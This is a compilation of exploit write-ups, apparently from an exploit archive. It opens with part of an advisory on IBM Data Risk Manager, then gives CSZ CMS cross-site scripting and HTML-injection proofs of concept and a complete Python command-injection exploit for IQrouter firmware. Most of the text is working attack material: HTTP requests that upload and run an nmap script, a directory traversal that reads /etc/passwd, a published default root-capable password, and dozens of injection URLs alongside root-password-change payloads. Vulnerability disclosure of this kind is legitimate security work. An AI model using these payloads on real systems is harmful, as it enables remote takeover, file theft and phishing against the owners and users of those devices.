                                        process = Runtime.getRuntime().exec(command.toArray(new String[command.size()]));

                                (...)
                        }
          (...)
        }
```          
As listed in [GTFObins](https://gtfobins.github.io/gtfobins/nmap), having access to nmap allows running arbitrary commands if we can upload a script file and then pass that as an argument to nmap with *"--script=<FILE\>"*. Looking at the code above, *ipAddress* looks like a good candidate for this.

However, to achieve code execution in this way we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to *"/home/a3user/agile3/patches/<FILE\>"*. The method is too long and verbose to paste here, but it is supposed to accept a patch file, process it and apply it.
There are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. Still, the file is uploaded and kept on disk even after the method aborts.

In order to upload a file, we simply need to send the following request:
```
POST /albatross/upload/patch HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: JSESSIONID=D68124D3EFD66417B4C6B0950E1891C0;
CSRF-TOKEN: 4f88a837-5f12-4d15-a0d5-57b24de17176
Content-Type: multipart/form-data; boundary=_Part_387_3982485447_258275719
Content-Length: 330
Connection: close

--_Part_387_3982485447_258275719
Content-Disposition: form-data; name="patchFiles"; filename="owned.enc"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

os.execute("/usr/bin/whoami > /tmp/testing")
--_Part_387_3982485447_258275719--
```
The server will respond with a 200 OK but will include a JSON message saying an error has occured. This is irrelevant, as the file was still uploaded to disk.  
Finally we inject our parameters and run nmap with the following request:
```
POST /albatross/restAPI/v2/nmap/run/scan/18 HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Bearer 3b5b0fa6-2d46-4104-ba38-54a077d05a93
Content-Type: multipart/form-data; boundary=_Part_841_3176682485_2250831758
Content-Length: 440
Connection: close

--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="clientDetails"


--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="type"

1
--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="portRange"


--_Part_841_3176682485_2250831758
Content-Disposition: form-data; name="ipAddress"

--script=/home/a3user/agile3/patches/owned.enc
--_Part_841_3176682485_2250831758--
```
This will execute *"nmap --script=/home/a3user/agile3/patches/owned.enc"* and run our command:
```
[a3user@idrm-server ~]$ cat /home/a3user/agile3/patches/owned.enc
os.execute("/usr/bin/whoami > /tmp/testing")
[a3user@idrm-server ~]$ cat /tmp/testing
a3user
```
Note that all of these requests require an authenticated session as an administrator - but as shown in #1, this can be easily bypassed. The actual flow to achieve full unauthenticated remote code execution is a bit more convoluted, as we need to authenticate to both the web interface and the API, but the basic workings have been described above.


### #3: Insecure Default Password
* [CWE-798: Use of Hard-coded Credentials](https://cwe.mitre.org/data/definitions/798.html)
* CVE-TODO (not assigned yet)
* Risk Classification: Critical
* Attack Vector: Remote
* Constraints: None / N/A
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.1 to 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:
The administrative user in the IDRM virtual appliance is *"a3user"*. This user is allowed to login via SSH and run sudo commands, and it is set up with a default password of *"idrm"*.  

When combined with vulnerabilities #1 and #2, this allows an unauthenticated attacker to achieve remote code execution as root on the IDRM virtual appliance, leading to complete system compromise.  

While IDRM forces the administrative user of the web interface (*"admin"*) to change its password upon first login, it does not require the same of *"a3user"*. 

### #4: Arbitrary File Download
* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](https://cwe.mitre.org/data/definitions/22.html)
* CVE-TODO (not assigned yet)
* Risk Classification: High
* Attack Vector: Remote
* Constraints: Authentication Required
* Affected Products / Versions:
  * IBM Data Risk Manager 2.0.2 and 2.0.3 confirmed to be vulnerable
  * IBM Data Risk Manager 2.0.4 to 2.0.6 likely to be vulnerable

#### Details:

IDRM exposes an API at */albatross/eurekaservice/fetchLogFiles* that allows an authenticated user to download log files from the system. However, the *logFileNameList* parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.  
The code path is convoluted, and won't be shown here for brevity, but exploitation (and finding this flaw) is very simple:

```
POST /albatross/eurekaservice/fetchLogFiles HTTP/1.1
Host: 10.0.10.25:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.10.25:8443/albatross/home
Content-Type: application/json
CSRF-TOKEN: 93e0dbe1-88e5-450e-ab2c-7c614b709876
Content-Length: 93
Cookie: JSESSIONID=ABFFB7EB959FAC45743AC2889960DFD0
Connection: close

{"instanceId":"local_host","logLevel":"DEBUG","logFileNameList":"../../../../../etc/passwd,"}
```

Response:
```
HTTP/1.1 200 
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Disposition: attachment; filename=ms_logs_admin.zip
Accept-Ranges: bytes
X-Content-Type-Options: nosniff
Content-Type: application/zip
Content-Length: 550
Date: Wed, 17 Oct 2018 11:46:45 GMT
Connection: close

<ZIP file containing /etc/passwd>
```
When combined with #1, this allows an unauthenticted attacker to download any file readable by *"a3user"* off the system.
It should be noted that version 2.0.1 is not vulnerable, but versions higher than 2.0.1 are. Attempting to download an arbitrary file using this method will result in a HTTP 500 error with a *"File security exception"* message.

## Exploitation Summary
By combining vulnerabilities #1, #2 and #3, an unauthenticated user can achieve remote code execution as root. [A Metasploit module implementing this RCE chain was released](https://github.com/rapid7/metasploit-framework/pull/13300) and the asciinema clip below shows it in action:  
[![asciicast](https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2.svg)](https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2)

If vulnerabilities #1 and #4 are combined, it's possible for an unauthenticated attacker to download arbitrary files off the system. [A second Metasploit module implementing this file download chain was released](https://github.com/rapid7/metasploit-framework/pull/13301), and the asciinema clip below shows it in action:  
[![asciicast](https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp.svg)](https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp)


## Fix / Solutions:
IBM refused to acknowledge this vulnerability report, so most likely won't fix this vulnerability. Make sure you uninstall the product so it does not endanger your network / company.

## Disclaimer
Please note that Agile Information Security (Agile InfoSec) relies on information provided by the vendor when listing fixed versions or products. Agile InfoSec does not verify this information, except when specifically mentioned in this advisory or when requested or contracted by the vendor to do so.   
Unconfirmed vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerabilities found by Agile Information Security are resolved properly.  
Agile Information Security Limited does not accept any responsibility, financial or otherwise, from any material losses, loss of life or reputational loss as a result of misuse of the information or code contained or mentioned in this advisory. It is the vendor's responsibility to ensure their products' security before, during and after release to market.

## License
All information, code and binary data in this advisory is released to the public under the [GNU General Public License, version 3 (GPLv3)](https://www.gnu.org/licenses/gpl-3.0.en.html).  
For information, code or binary data obtained from other sources that has a license which is incompatible with GPLv3, the original license prevails.

# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Unauthorized user that has access private message can embed Javascript
# code to admin panel.

# Steps to reproduce:
1- Log in to member panel.
1- Change user-agent header as <script>alert(1)</script>
2- Send the private message to admin user.
3- When admin user logs in to Backend System Dashboard, an alert box pops
up on screen.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send

# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Authenticated user can inject hyperlink to Backend System Dashboard and
# Member Dashboard via message.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send

# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A 

#!/usr/bin/env python3
import argparse
from sys import argv, exit

try:
    import requests
except ImportError:
    print("Install requests lib! pip3 install requests")


print("""
#######################################################################
#           IQrouter multiple RCE and other vulnerabilities           #
#                   by drakylar (Shaposhnikov Ilya)                   #
#            CVE-2020-11963 CVE-2020-11964 CVE-2020-11966             #
#                    CVE-2020-11967 CVE-2020-11968                    #
#######################################################################
""")


rce_setup = [
    [
"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
"RCE /vlanTag (vlan_tag param)"
    ],
    [
"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
    ],
    [
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
"RCE /screen9 (s2 param)"
    ],
    [
"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
"RCE /screen9 (s1 param)"
    ],
    [
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
"RCE /screen9 (p2 param)"
    ],
    [
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
"RCE /screen9 (p1 param)"
    ],
    [
"/cgi-bin/luci/er/screen4?save_isp='`{}`",
"RCE /screen4 (save_isp param)"
    ],
    [
"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
"RCE /screen2 set_wan_modem_interfaces param)"
    ],
    [
"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
"RCE /screen2 find_ip_address_conflict param)"
    ],
    [
"/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
"RCE /screen10 (set_security_question param)"
    ],
    [
"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
"RCE /screen10 (set_security_answer param)"],
    [
"/cgi-bin/luci/er/screen1?zonename='`{}`'",
"RCE /screen1 (zonename param)"
    ],
    [
"/cgi-bin/luci/er/register?email=`{}`",
"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
    ]
]

rce_any = [
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
"RCE /wifi (s2 param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
"RCE /wifi (s1 param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
"RCE /wifi (p2 param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
"RCE /wifi (p1 param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_5g_ssid param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_2g_ssid param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guest_key param)"
    ],
    [
"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
"RCE /wifi (enable_guestwifi param)"
    ],
    [
"/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123",
"RCE /screen11.1 (email param)"
    ],
    [
"/cgi-bin/luci/er/reboot_link?link='`{}`'",
"RCE /reboot_link (link param)"
    ],
    [
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
"RCE /diag_wifi (htm5ghz param)"
    ],
    [
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
"RCE /diag_wifi (htm2ghz param)"
    ],
    [
"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
"RCE /diag_wifi (c5ghz param)"
    ],
    [
"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
"RCE /diag_wifi (c2ghz param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
"RCE /diag_set_static_wan (static_ip param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
"RCE /diag_set_static_wan (net_mask param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
"RCE /diag_set_static_wan (gateway param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
"RCE /diag_set_static_wan (dns param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
"RCE /diag_set_static_modem (static_ip param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
"RCE /diag_set_static_modem (net_mask param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
"RCE /diag_set_static_modem (gateway param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
"RCE /diag_set_device_name_and_sync (device_name param)"
    ],
    [
"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
"RCE /diag_set_device_name (device_name param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
"RCE /diag_pppoe_update (wan_username param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
"RCE /diag_pppoe_update (wan_password param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
"RCE /diag_pppoe (wan_username param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
"RCE /diag_pppoe (wan_password param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
"RCE /diag_pppoa_update (wan_username param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
"RCE /diag_pppoa_update (wan_password param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
"RCE /diag_pppoa (wan_username param)"
    ],
    [
"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
"RCE /diag_pppoa (wan_password param)"
    ],
    [
"/cgi-bin/luci/er/advanced_link?link='`{}`'",
"RCE /advanced_link (link param)"
    ]

]

advanced_payloads = [
    [
"/cgi-bin/luci/er/reboot_link?reboot=1",
"Reboot IQrouter (/reboot_link reboot param))"
    ],
    [
"/cgi-bin/luci/er/screen2?reboot=1",
"Reboot IQrouter (/screen2 reboot param))"
    ],
    [
"/cgi-bin/luci/er/index?reset_config=1",
"Reset IQrouter (/index reset_config param)"
    ],
    [
"/cgi-bin/luci/er/screen7?upgrade=1",
"Upgrade IQrouter (/screen7 upgrade param)"
    ],
    [
"/cgi-bin/luci/er/vlanTag?restart_network=1",
"Restart network (/vlanTag restart_network param)"
    ],
    [
"/cgi-bin/luci/er/diag_iperf_cmd/start",
"Start iperf script (/diag_iperf_cmd/start)"
    ],
    [
"/cgi-bin/luci/er/diag_iperf_cmd/stop",
"Stop iperf script (/diag_iperf_cmd/stop)"
    ],
    [
"/cgi-bin/luci/er/get_syslog",
"Router setup info log (/get_syslog)"
    ],
    [
"/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
"Change root password to c00lpasswd (can change in code)"
    ],
    [
"/cgi-bin/luci/er/reset_password/",
"Change root password to 'changeme' (static)"
    ]
]


def print_payloads():
    print('#' * 30)
    print("Payloads list")
    num = 1
    print('#########################  RCE without auth  ########################')
    for payload in rce_any:
        print("{} - {}".format(num, payload[1]))
        num += 1

    print(
'###############  RCE (router need to be in setup mode)  ###############')
    for payload in rce_setup:
        print("{} - {}".format(num, payload[1]))
        num += 1

    print(
'#########################  Advanced payloads  #########################')
    for payload in advanced_payloads:
        print("{} - {}".format(num, payload[1]))
        num += 1


parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
                    default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
                    default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
                    default="http", type=str)

args = parser.parse_args()


def main():
    print("")
    full_payload_list = rce_setup + rce_any + advanced_payloads
    payloads_amount = len(full_payload_list)
    try:
        hostname = args.host
        port = args.port
        payload_num = int(args.num)
        bash_cmd = args.cmd
        protocol = args.protocol

        if payload_num < 1 or payload_num > payloads_amount:
            print("Error with payload number!")
            raise IndexError
        if port < 0 or port > 65535:
            print("Error with port number")
            raise IndexError
        if protocol not in ['http', 'https']:
            print("Error with protocol name")
            raise IndexError

        current_payload = full_payload_list[payload_num - 1]
        print("Payload: {}".format(current_payload[1]))
        print("Host: {}".format(hostname))
        print("Port: {}".format(port))
        print("Protocol: {}".format(protocol))
        print("Command: {}".format(bash_cmd))

        full_url = "{}://{}:{}{}".format(protocol, hostname, port,
                                         current_payload[0].format(bash_cmd))
        print("Built URL: {}".format(full_url))

        r = requests.get(full_url)
        print("Status code: {}".format(r.status_code))
        return
    except IndexError:
        parser.print_help()
        print_payloads()
        exit(1)


if __name__ == '__main__':
    print(
"\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
    exit(main())